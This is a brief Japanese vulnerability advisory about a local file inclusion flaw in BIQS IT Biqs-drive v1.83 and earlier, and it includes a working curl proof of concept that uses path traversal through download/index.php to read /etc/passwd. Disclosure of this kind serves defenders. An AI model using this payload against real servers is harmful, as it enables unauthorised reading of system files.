
BIQS IT Biqs-drive v1.83
BIQS IT Biqs-drive v1.83 およびそれ以前のバージョンでは、download/index.php の file パラメータに特定のペイロードを送信すると、ローカルファイルインクルージョン (LFI) の脆弱性が存在します。これにより、攻撃者は設定された Web ユーザーの権限でサーバー上の任意のファイルを読み取ることができます。
curl https://TARGET/download/index.php?file=../../../../../../../../../etc/passwd